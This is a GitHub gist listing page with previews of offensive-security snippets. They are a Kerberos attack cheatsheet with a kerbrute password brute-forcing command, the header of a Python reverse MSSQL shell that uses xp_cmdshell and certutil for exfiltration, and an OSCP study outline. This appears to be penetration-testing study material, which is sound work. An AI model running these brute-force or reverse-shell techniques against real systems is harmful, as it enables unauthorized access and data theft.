Skip to content

Instantly share code, notes, and snippets.

View TheVeryAngryUnicorn's full-sized avatar
💭
Enraged

TheVeryAngryUnicorn TheVeryAngryUnicorn

💭
Enraged
View GitHub Profile
@TheVeryAngryUnicorn
TheVeryAngryUnicorn / kerberos_attacks_cheatsheet.md
Created June 29, 2020 17:07 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@TheVeryAngryUnicorn
TheVeryAngryUnicorn / mandros.py
Created June 19, 2020 08:50 — forked from xassiz/mandros.py
Reverse MSSQL shell
import sys
import requests
import threading
import HTMLParser
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
'''
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
Author: @xassiz
'''

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Escalate
  5. Document it

Time yourself